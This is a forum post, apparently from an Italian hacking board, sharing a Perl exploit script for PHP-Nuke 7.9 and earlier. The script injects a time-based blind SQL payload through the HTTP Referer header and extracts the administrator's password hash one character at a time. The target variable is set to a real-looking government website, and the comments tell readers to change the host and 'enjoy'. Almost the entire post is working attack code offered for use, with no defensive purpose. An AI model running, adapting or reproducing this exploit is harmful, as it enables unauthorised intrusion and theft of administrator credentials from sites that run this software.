Jump to content
Ras

POSTNUKE <=7.9 0day

By Ras, in Exploituri

Recommended Posts

Ras Newbie

Ras

Posted
Posted 
#!/usr/bin/perl

#0day exploit for PHP-nuke <=7.9 maybe other version (Ex. 8.0)

#root_unix [url]www.unixcrew.org[/url]

#Chiudere tutti i programmi che possono occupare banda
#kill all the programs that can slow down the connection

#Modificare la variabile HOST e divertitevi
#modify the variable HOST and enjoy

use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;


my $host = "http://www.softwarelivre.gov.br";

my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(GET => $host);

my $referer;
my $inizio;
my $risposta;
my $fine;
my $tempodefault;
my $tempo;
my $i;
my $j;
my $hash;
my @array;

@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);


$referer="http://www.hackingz0ne.altervista.org";
$tempodefault=richiesta($referer);
$hash="";


#QUERY RISULTANTE   
#INSERT INTO nuke_referer VALUES (NULL, 'http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,1,1))=102),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*')

for ($i=1;$i<33;$i++)
   {
   for ($j=0;$j<16;$j++)
   {
      $referer="http://www.hackingz0ne.altervista.org'+(SELECT IF((ASCII(SUBSTRING(`pwd`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE `radminsuper`=1)+'')/*";
      $tempo=richiesta($referer);
      aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
      if($tempo>9)
      {
         $tempo=richiesta($referer);
         aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
         if($tempo>9)
         {
            $hash .=chr($array[$j]);
            aggiorna($host,$tempodefault,$j,$hash,$tempo,$i);
            $j=200;
         }
      }

   }
   if($i==1)
   {
      if($hash eq "")
      {
         $i=200;
         print "Attacco Fallito Sito Fixato\n";
      }
   }
}


   print "Attacco Terminato\n\n";

system("pause");


sub richiesta{
   $referer=$_[0];
   $metodo->referrer($referer);
   $inizio=Time::HiRes::time();
   $risposta=$useragent->request($metodo);
   $risposta->is_success or die "$host : ",$risposta->message,"\n";
   $fine=Time::HiRes::time();
   $tempo=$fine-$inizio;
   return $tempo
}

sub aggiorna{
   system("cls");
   @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
   print "Exploit Php-Nuke <=7.9 By Rossi46GO maybe other version (Ex. 8.0) Thx KingOfSka\n";
   print "Visit www.Hackingz0ne.altervista.org\n\n";
   print "Sito Vittima : " . $_[0] . "\n";
   print "Tempo Default : " . $_[1] . " secondi\n";
   print "Bruteforcing Hash : " . chr($array[$_[2]]) . "\n";
   print "Bruteforcing n carattere Hash : " . $_[5] . "\n";
   print "Tempo sql : " . $_[4] . " secondi\n";
   print "Hash : " . $_[3] . "\n";
}

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...